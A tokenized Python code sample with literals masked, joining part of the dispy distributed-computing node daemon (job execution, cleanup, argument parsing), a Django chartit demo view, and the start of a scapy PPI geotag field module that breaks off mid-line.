<EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( info ) ) <EOL> except : <EOL> pass <EOL> finally : <EOL> sock . close ( ) <EOL> def __job_program ( self , _job , job_info ) : <EOL> compute = self . computations [ _job . compute_id ] <EOL> if compute . name . endswith ( '<STR_LIT>' ) : <EOL> program = [ sys . executable , compute . name ] <EOL> else : <EOL> program = [ compute . name ] <EOL> args = unserialize ( _job . args ) <EOL> program . extend ( args ) <EOL> reply = job_info . job_reply <EOL> try : <EOL> os . chdir ( compute . dest_path ) <EOL> env = { } <EOL> env . update ( os . environ ) <EOL> env [ '<STR_LIT>' ] = compute . dest_path + os . pathsep + env [ '<STR_LIT>' ] <EOL> job_info . proc = subprocess . Popen ( program , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE , env = env ) <EOL> assert isinstance ( job_info . proc , subprocess . Popen ) <EOL> reply . stdout , reply . stderr = job_info . proc . communicate ( ) <EOL> reply . result = job_info . proc . returncode <EOL> reply . status = DispyJob . Finished <EOL> except : <EOL> reply . exception = traceback . format_exc ( ) <EOL> reply . status = DispyJob . Terminated <EOL> reply . end_time = time . time ( ) <EOL> job_info . proc = None <EOL> self . reply_Q . put ( reply ) <EOL> def __reply_Q ( self ) : <EOL> while True : <EOL> job_reply = self . reply_Q . get ( ) <EOL> if job_reply is None : <EOL> break <EOL> self . thread_lock . acquire ( ) <EOL> job_info = self . job_infos . get ( job_reply . uid , None ) <EOL> if job_info is not None : <EOL> job_info . job_reply = job_reply <EOL> self . thread_lock . release ( ) <EOL> if job_info is not None : <EOL> self . num_jobs += <NUM_LIT:1> <EOL> self . cpu_time += ( job_reply . end_time - job_reply . start_time ) <EOL> if job_info . proc is not None : <EOL> if isinstance ( job_info . proc , multiprocessing . Process ) : <EOL> job_info . proc . join ( <NUM_LIT:2> ) <EOL> else : <EOL> job_info . proc . wait ( ) <EOL> Coro ( self . _send_job_reply , job_info , resending = False ) <EOL> compute = self . computations . get ( job_info . compute_id , None ) <EOL> if not compute : <EOL> continue <EOL> for xf in job_info . xfer_files : <EOL> path = os . path . join ( compute . dest_path , os . path . basename ( xf . name ) ) <EOL> try : <EOL> compute . file_uses [ path ] -= <NUM_LIT:1> <EOL> if compute . file_uses [ path ] == <NUM_LIT:0> : <EOL> compute . file_uses . pop ( path ) <EOL> os . remove ( path ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , path ) <EOL> continue <EOL> def _send_job_reply ( self , job_info , resending = False , coro = None ) : <EOL> """<STR_LIT>""" <EOL> job_reply = job_info . job_reply <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> job_reply . uid , job_reply . status , str ( job_info . reply_addr ) ) <EOL> compute = self . computations . get ( job_info . compute_id , None ) <EOL> if not resending : <EOL> self . thread_lock . acquire ( ) <EOL> assert self . job_infos . pop ( job_reply . uid , None ) is not None <EOL> self . thread_lock . release ( ) <EOL> self . avail_cpus += <NUM_LIT:1> <EOL> assert self . avail_cpus <= self . num_cpus <EOL> if compute : <EOL> compute . pending_jobs -= <NUM_LIT:1> <EOL> sock = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> sock = AsyncSocket ( sock , keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> try : <EOL> yield sock . connect ( job_info . reply_addr ) <EOL> yield sock . send_msg ( b'<STR_LIT>' + serialize ( job_reply ) ) <EOL> ack = yield sock . recv_msg ( ) <EOL> assert ack == b'<STR_LIT>' <EOL> except : <EOL> status = - <NUM_LIT:1> <EOL> if not resending : <EOL> f = os . path . join ( job_info . compute_dest_path , '<STR_LIT>' % job_reply . uid ) <EOL> _dispy_logger . error ( '<STR_LIT>' , <EOL> job_reply . uid , str ( job_info . reply_addr ) , f ) <EOL> try : <EOL> fd = open ( f , '<STR_LIT:wb>' ) <EOL> pickle . dump ( job_reply , fd ) <EOL> fd . close ( ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , job_reply . uid ) <EOL> else : <EOL> if compute is not None : <EOL> compute . pending_results += <NUM_LIT:1> <EOL> else : <EOL> status = <NUM_LIT:0> <EOL> if compute : <EOL> compute . last_pulse = time . time ( ) <EOL> if resending : <EOL> compute . pending_results -= <NUM_LIT:1> <EOL> elif compute . pending_results : <EOL> Coro ( self . resend_job_results , compute ) <EOL> if resending : <EOL> f = os . path . join ( job_info . compute_dest_path , <EOL> '<STR_LIT>' % job_reply . uid ) <EOL> if os . path . isfile ( f ) : <EOL> try : <EOL> os . remove ( f ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , f ) <EOL> if compute is None : <EOL> fd = open ( os . path . join ( self . dest_path_prefix , <EOL> '<STR_LIT>' % ( job_info . compute_id , job_info . compute_auth ) ) , <EOL> '<STR_LIT:rb>' ) <EOL> compute = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> if compute : <EOL> compute . pending_results -= <NUM_LIT:1> <EOL> finally : <EOL> sock . close ( ) <EOL> if compute and compute . pending_jobs == <NUM_LIT:0> and compute . zombie : <EOL> self . cleanup_computation ( compute ) <EOL> raise StopIteration ( status ) <EOL> def cleanup_computation ( self , compute ) : <EOL> if not compute . zombie or compute . pending_jobs > <NUM_LIT:0> : <EOL> return <EOL> if compute . pending_jobs != <NUM_LIT:0> : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> compute . name , compute . id , compute . pending_jobs ) <EOL> if self . computations . pop ( compute . id , None ) is None : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . id ) <EOL> return <EOL> self . num_computations += <NUM_LIT:1> <EOL> file_uses , compute . file_uses = compute . file_uses , { } <EOL> globalvars , compute . globals = compute . globals , { } <EOL> pkl_path = os . path . join ( self . dest_path_prefix , '<STR_LIT>' % ( compute . id , compute . auth ) ) <EOL> if compute . pending_results == <NUM_LIT:0> : <EOL> try : <EOL> os . remove ( pkl_path ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , pkl_path ) <EOL> else : <EOL> fd = open ( pkl_path , '<STR_LIT:wb>' ) <EOL> pickle . dump ( compute , fd ) <EOL> fd . close ( ) <EOL> self . scheduler [ '<STR_LIT>' ] . discard ( compute . auth ) <EOL> if ( ( not self . computations ) and ( not self . scheduler [ '<STR_LIT>' ] ) and <EOL> compute . scheduler_ip_addr == self . scheduler [ '<STR_LIT>' ] and <EOL> compute . scheduler_port == self . scheduler [ '<STR_LIT:port>' ] ) : <EOL> self . scheduler [ '<STR_LIT>' ] = None <EOL> self . pulse_interval = None <EOL> self . timer_coro . resume ( None ) <EOL> if self . serve > <NUM_LIT:0> : <EOL> self . serve -= <NUM_LIT:1> <EOL> Coro ( self . broadcast_ping_msg ) <EOL> if compute . cleanup is False : <EOL> if self . serve == <NUM_LIT:0> : <EOL> self . shutdown ( quit = True ) <EOL> return <EOL> os . chdir ( self . dest_path_prefix ) <EOL> if isinstance ( compute . cleanup , _Function ) : <EOL> try : <EOL> localvars = { '<STR_LIT>' : compute . cleanup . args , <EOL> '<STR_LIT>' : compute . cleanup . kwargs } <EOL> if os . name == '<STR_LIT>' : <EOL> globalvars = globals ( ) <EOL> exec ( marshal . loads ( compute . code ) , globalvars , localvars ) <EOL> exec ( '<STR_LIT>' % <EOL> compute . cleanup . name , globalvars , localvars ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , compute . cleanup . name ) <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> if os . name == '<STR_LIT>' : <EOL> for var in list ( globals ( ) . keys ( ) ) : <EOL> if var not in self . __init_globals : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> var , compute . name , compute . scheduler_ip_addr ) <EOL> globals ( ) . pop ( var , None ) <EOL> for var , value in self . __init_globals . items ( ) : <EOL> if var in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> continue <EOL> if value != globals ( ) . get ( var , None ) : <EOL> _dispy_logger . warning ( '<STR_LIT>' , <EOL> var , compute . name , compute . scheduler_ip_addr ) <EOL> globals ( ) [ var ] = value <EOL> for module in list ( sys . modules . keys ( ) ) : <EOL> if module not in compute . ante_modules : <EOL> sys . modules . pop ( module , None ) <EOL> sys . modules . update ( self . __init_modules ) <EOL> for path in os . listdir ( compute . dest_path ) : <EOL> path = os . path . join ( compute . dest_path , path ) <EOL> if file_uses . get ( path , <NUM_LIT:1> ) == <NUM_LIT:1> : <EOL> try : <EOL> if os . path . isfile ( path ) or os . path . islink ( path ) : <EOL> os . remove ( path ) <EOL> elif os . path . isdir ( path ) : <EOL> shutil . rmtree ( path , ignore_errors = True ) <EOL> else : <EOL> os . remove ( path ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , path ) <EOL> if os . path . isdir ( compute . dest_path ) and compute . dest_path . startswith ( self . dest_path_prefix ) and len ( os . listdir ( compute . dest_path ) ) == <NUM_LIT:0> : <EOL> try : <EOL> os . rmdir ( compute . dest_path ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . dest_path ) <EOL> else : <EOL> _dispy_logger . debug ( '<STR_LIT>' , compute . dest_path ) <EOL> if self . serve == <NUM_LIT:0> : <EOL> self . shutdown ( quit = True ) <EOL> def shutdown ( self , quit = True ) : <EOL> def _shutdown ( self , quit , coro = None ) : <EOL> self . thread_lock . acquire ( ) <EOL> job_infos , self . job_infos = self . job_infos , { } <EOL> if quit and self . reply_Q : <EOL> self . reply_Q . put ( None ) <EOL> self . scheduler [ '<STR_LIT>' ] = None <EOL> self . scheduler [ '<STR_LIT>' ] = set ( ) <EOL> self . avail_cpus += len ( job_infos ) <EOL> if self . avail_cpus != self . num_cpus : <EOL> _dispy_logger . warning ( '<STR_LIT>' , self . avail_cpus , self . num_cpus ) <EOL> self . thread_lock . release ( ) <EOL> for uid , job_info in job_infos . items ( ) : <EOL> job_info . proc . terminate ( ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , uid ) <EOL> if isinstance ( job_info . proc , multiprocessing . Process ) : <EOL> job_info . proc . join ( <NUM_LIT:2> ) <EOL> else : <EOL> job_info . proc . wait ( ) <EOL> for cid , compute in list ( self . computations . items ( ) ) : <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , compute . scheduler_ip_addr ) <EOL> info = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . sign } <EOL> try : <EOL> yield sock . connect ( ( compute . scheduler_ip_addr , compute . scheduler_port ) ) <EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( info ) ) <EOL> except : <EOL> pass <EOL> sock . close ( ) <EOL> compute . pending_jobs = <NUM_LIT:0> <EOL> compute . zombie = True <EOL> self . cleanup_computation ( compute ) <EOL> if quit : <EOL> self . tcp_coro . terminate ( ) <EOL> self . sign = '<STR_LIT>' <EOL> if self . sign : <EOL> Coro ( _shutdown , self , quit ) <EOL> def read_stdin ( self , coro = None ) : <EOL> coro . set_daemon ( ) <EOL> thread_pool = asyncoro . AsyncThreadPool ( <NUM_LIT:1> ) <EOL> while True : <EOL> sys . stdout . write ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> sys . stdout . flush ( ) <EOL> try : <EOL> cmd = yield thread_pool . async_task ( input ) <EOL> except : <EOL> continue <EOL> cmd = cmd . strip ( ) . lower ( ) <EOL> if cmd in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> break <EOL> elif cmd in ( '<STR_LIT>' , '<STR_LIT:start>' , '<STR_LIT>' ) : <EOL> if cmd == '<STR_LIT>' : <EOL> cpus = <NUM_LIT:0> <EOL> elif cmd == '<STR_LIT:start>' : <EOL> cpus = self . num_cpus <EOL> elif cmd == '<STR_LIT>' : <EOL> cpus = multiprocessing . cpu_count ( ) <EOL> sys . stdout . write ( '<STR_LIT>' % <EOL> ( cpus - <NUM_LIT:1> , cpus ) ) <EOL> sys . stdout . flush ( ) <EOL> try : <EOL> cpus = yield thread_pool . async_task ( input ) <EOL> cpus = int ( cpus ) <EOL> if cpus >= <NUM_LIT:0> : <EOL> assert cpus <= multiprocessing . cpu_count ( ) <EOL> else : <EOL> cpus += multiprocessing . cpu_count ( ) <EOL> assert cpus >= <NUM_LIT:0> <EOL> except : <EOL> print ( '<STR_LIT>' ) <EOL> continue <EOL> self . num_cpus = cpus <EOL> self . avail_cpus = cpus - len ( self . job_infos ) <EOL> if self . scheduler [ '<STR_LIT>' ] : <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> try : <EOL> yield sock . connect ( ( self . scheduler [ '<STR_LIT>' ] , self . scheduler [ '<STR_LIT:port>' ] ) ) <EOL> info = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT>' : self . sign , '<STR_LIT>' : cpus } <EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( info ) ) <EOL> except : <EOL> pass <EOL> finally : <EOL> sock . close ( ) <EOL> else : <EOL> if self . num_cpus > <NUM_LIT:0> : <EOL> Coro ( self . broadcast_ping_msg ) <EOL> else : <EOL> print ( '<STR_LIT>' % <EOL> ( self . avail_cpus + len ( self . job_infos ) , <EOL> '<STR_LIT>' % self . serivce_start if self . service_start else '<STR_LIT>' , <EOL> '<STR_LIT>' % self . service_end if self . service_end else '<STR_LIT>' , <EOL> '<STR_LIT>' % self . serve if self . serve > <NUM_LIT:0> else '<STR_LIT>' ) ) <EOL> print ( '<STR_LIT>' % <EOL> ( self . num_computations , self . num_jobs , self . cpu_time ) ) <EOL> print ( '<STR_LIT>' ) <EOL> for i , compute in enumerate ( self . computations . values ( ) , start = <NUM_LIT:1> ) : <EOL> print ( '<STR_LIT>' % <EOL> ( i , compute . name , compute . scheduler_ip_addr , compute . pending_jobs ) ) <EOL> print ( '<STR_LIT>' ) <EOL> self . shutdown ( quit = True ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import argparse <EOL> import re <EOL> _dispy_logger = asyncoro . Logger ( '<STR_LIT>' ) <EOL> _dispy_logger . info ( '<STR_LIT>' , _dispy_version ) <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = False , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT:-c>' , '<STR_LIT>' , dest = '<STR_LIT>' , type = int , default = <NUM_LIT:0> , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , type = int , default = <NUM_LIT> , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , type = str , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , type = int , default = <NUM_LIT> , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = str ( MaxFileSize ) , type = str , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = <NUM_LIT> , type = float , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = - <NUM_LIT:1> , type = int , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = MsgTimeout , type = float , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _dispy_config = vars ( parser . parse_args ( sys . argv [ <NUM_LIT:1> : ] ) ) <EOL> del parser <EOL> if _dispy_config [ '<STR_LIT>' ] and os . path . isfile ( _dispy_config [ '<STR_LIT>' ] ) : <EOL> import ConfigParser <EOL> cfgp = ConfigParser . ConfigParser ( ) <EOL> cfgp . read ( _dispy_config [ '<STR_LIT>' ] ) <EOL> _dispy_config , cfgp = dict ( cfgp . items ( '<STR_LIT>' ) ) , _dispy_config <EOL> _dispy_config . update ( cfgp ) <EOL> del cfgp <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> import ConfigParser <EOL> cfgp = ConfigParser . ConfigParser ( _dispy_config ) <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> cfgfd = open ( _dispy_config [ '<STR_LIT>' ] , '<STR_LIT:w>' ) <EOL> _dispy_config . pop ( '<STR_LIT>' ) <EOL> else : <EOL> cfgfd = sys . stdout <EOL> _dispy_config . pop ( '<STR_LIT>' ) <EOL> cfgp . write ( cfgfd ) <EOL> exit ( <NUM_LIT:0> ) <EOL> _dispy_config . pop ( '<STR_LIT>' , None ) <EOL> _dispy_config . pop ( '<STR_LIT>' , None ) <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> _dispy_logger . setLevel ( logging . DEBUG ) <EOL> asyncoro . logger . setLevel ( logging . DEBUG ) <EOL> else : <EOL> _dispy_logger . setLevel ( logging . INFO ) <EOL> del _dispy_config [ '<STR_LIT>' ] <EOL> cpus = multiprocessing . cpu_count ( ) <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> if _dispy_config [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> if _dispy_config [ '<STR_LIT>' ] > cpus : <EOL> raise Exception ( '<STR_LIT>' % cpus ) <EOL> else : <EOL> if _dispy_config [ '<STR_LIT>' ] <= - cpus : <EOL> raise Exception ( '<STR_LIT>' % cpus ) <EOL> cpus += _dispy_config [ '<STR_LIT>' ] <EOL> _dispy_config [ '<STR_LIT>' ] = cpus <EOL> else : <EOL> _dispy_config [ '<STR_LIT>' ] = cpus <EOL> del cpus <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> _dispy_config [ '<STR_LIT>' ] = float ( _dispy_config [ '<STR_LIT>' ] ) <EOL> if _dispy_config [ '<STR_LIT>' ] < <NUM_LIT:1> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> MsgTimeout = _dispy_config [ '<STR_LIT>' ] <EOL> del _dispy_config [ '<STR_LIT>' ] <EOL> m = re . match ( r'<STR_LIT>' , _dispy_config [ '<STR_LIT>' ] ) <EOL> if m : <EOL> MaxFileSize = int ( m . group ( <NUM_LIT:1> ) ) <EOL> if m . group ( <NUM_LIT:2> ) : <EOL> m = m . group ( <NUM_LIT:2> ) . lower ( ) <EOL> if m == '<STR_LIT:k>' : <EOL> MaxFileSize *= <NUM_LIT> <EOL> elif m == '<STR_LIT:m>' : <EOL> MaxFileSize *= <NUM_LIT> ** <NUM_LIT:2> <EOL> elif m == '<STR_LIT:g>' : <EOL> MaxFileSize *= <NUM_LIT> ** <NUM_LIT:3> <EOL> elif m == '<STR_LIT:t>' : <EOL> MaxFileSize *= <NUM_LIT> ** <NUM_LIT:4> <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> del m <EOL> del _dispy_config [ '<STR_LIT>' ] <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> _dispy_config [ '<STR_LIT>' ] = time . strptime ( _dispy_config [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> _dispy_config [ '<STR_LIT>' ] = time . strptime ( _dispy_config [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> _dispy_config [ '<STR_LIT>' ] = time . strptime ( _dispy_config [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> try : <EOL> if os . getpgrp ( ) != os . tcgetpgrp ( sys . stdin . fileno ( ) ) : <EOL> _dispy_config [ '<STR_LIT>' ] = True <EOL> except : <EOL> pass <EOL> if os . name == '<STR_LIT>' : <EOL> _dispy_config [ '<STR_LIT>' ] = True <EOL> if psutil : <EOL> psutil . cpu_percent ( <NUM_LIT:0.1> ) <EOL> else : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _dispy_node = None <EOL> _dispy_node = _DispyNode ( ** _dispy_config ) <EOL> del _dispy_config <EOL> _dispy_node . asyncoro . finish ( ) </s>
<s> from django . shortcuts import render_to_response <EOL> from demoproject . chartdemo . models import MonthlyWeatherByCity <EOL> from chartit import DataPool , Chart <EOL> def homepage ( request ) : <EOL> ds = DataPool ( <EOL> series = <EOL> [ { '<STR_LIT>' : { <EOL> '<STR_LIT:source>' : MonthlyWeatherByCity . objects . all ( ) } , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] } <EOL> ] ) <EOL> def monthname ( month_num ) : <EOL> names = { <NUM_LIT:1> : '<STR_LIT>' , <NUM_LIT:2> : '<STR_LIT>' , <NUM_LIT:3> : '<STR_LIT>' , <NUM_LIT:4> : '<STR_LIT>' , <NUM_LIT:5> : '<STR_LIT>' , <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <NUM_LIT:8> : '<STR_LIT>' , <NUM_LIT:9> : '<STR_LIT>' , <NUM_LIT:10> : '<STR_LIT>' , <NUM_LIT:11> : '<STR_LIT>' , <NUM_LIT:12> : '<STR_LIT>' } <EOL> return names [ month_num ] <EOL> cht = Chart ( <EOL> datasource = ds , <EOL> series_options = <EOL> [ { '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> } } ] , <EOL> chart_options = <EOL> { '<STR_LIT:title>' : { <EOL> '<STR_LIT:text>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:title>' : { <EOL> '<STR_LIT:text>' : '<STR_LIT>' } } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:title>' : { <EOL> '<STR_LIT:text>' : '<STR_LIT>' } } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : False } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : False } } , <EOL> x_sortf_mapf_mts = ( None , monthname , False ) ) <EOL> return render_to_response ( '<STR_LIT>' , { '<STR_LIT>' : cht } ) </s>
<s> """<STR_LIT>""" <EOL> import struct <EOL> from scapy . packet import * <EOL> from scapy . fields import * <EOL> from scapy . contrib . ppi import PPIGenericFldHdr , addPPIType <EOL> CURR_GEOTAG_VER = <NUM_LIT:2> <EOL> PPI_GPS = <NUM_LIT> <EOL> PPI_VECTOR = <NUM_LIT> <EOL> PPI_SENSOR = <NUM_LIT> <EOL> PPI_ANTENNA = <NUM_LIT> <EOL> class Fixed3_6Field ( LEIntField ) : <EOL> def i2h ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x < <NUM_LIT:0> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x > <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = x * <NUM_LIT> <EOL> return x <EOL> def h2i ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x <= - <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x >= <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = int ( round ( x * <NUM_LIT> ) ) <EOL> return x <EOL> def i2m ( self , pkt , x ) : <EOL> """<STR_LIT>""" <EOL> if x is None : <EOL> x = self . h2i ( pkt , <NUM_LIT:0> ) <EOL> return x <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> y = <NUM_LIT:0> <EOL> else : <EOL> y = self . i2h ( pkt , x ) <EOL> return "<STR_LIT>" % ( y ) <EOL> class Fixed3_7Field ( LEIntField ) : <EOL> def i2h ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x < <NUM_LIT:0> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x > <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = ( x - <NUM_LIT> ) * <NUM_LIT> <EOL> return x <EOL> def h2i ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x <= - <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = - <NUM_LIT> <EOL> elif ( x >= <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = int ( round ( ( x + <NUM_LIT> ) * <NUM_LIT> ) ) <EOL> return x <EOL> def i2m ( self , pkt , x ) : <EOL> """<STR_LIT>""" <EOL> if x is None : <EOL> x = self . h2i ( pkt , <NUM_LIT:0> ) <EOL> return x <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> y = <NUM_LIT:0> <EOL> else : <EOL> y = self . i2h ( pkt , x ) <EOL> return "<STR_LIT>" % ( y ) <EOL> class Fixed6_4Field ( LEIntField ) : <EOL> def i2h ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x < <NUM_LIT:0> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x > <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = ( x - <NUM_LIT> ) * <NUM_LIT> <EOL> return x <EOL> def h2i ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x <= - <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = - <NUM_LIT> <EOL> elif ( x >= <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = int ( round ( ( x + <NUM_LIT> ) * <NUM_LIT> ) ) <EOL> return x <EOL> def i2m ( self , pkt , x ) : <EOL> """<STR_LIT>""" <EOL> if x is None : <EOL> x = self . h2i ( pkt , <NUM_LIT:0> ) <EOL> return x <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> y = <NUM_LIT:0> <EOL> else : <EOL> y = self . i2h ( pkt , x ) <EOL> return "<STR_LIT>" % ( y ) <EOL> class NSCounter_Field ( LEIntField ) : <EOL> def i2h ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x < <NUM_LIT:0> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x >= <NUM_LIT:2> ** <NUM_LIT:32> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:2> ** <NUM_LIT:32> - <NUM_LIT:1> <EOL> x = ( x / <NUM_LIT> ) <EOL> return x <EOL> def h2i ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x < <NUM_LIT:0> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x >= ( <NUM_LIT:2> ** <NUM_LIT:32> ) / <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = ( <NUM_LIT:2> ** <NUM_LIT:32> - <NUM_LIT:1> ) / 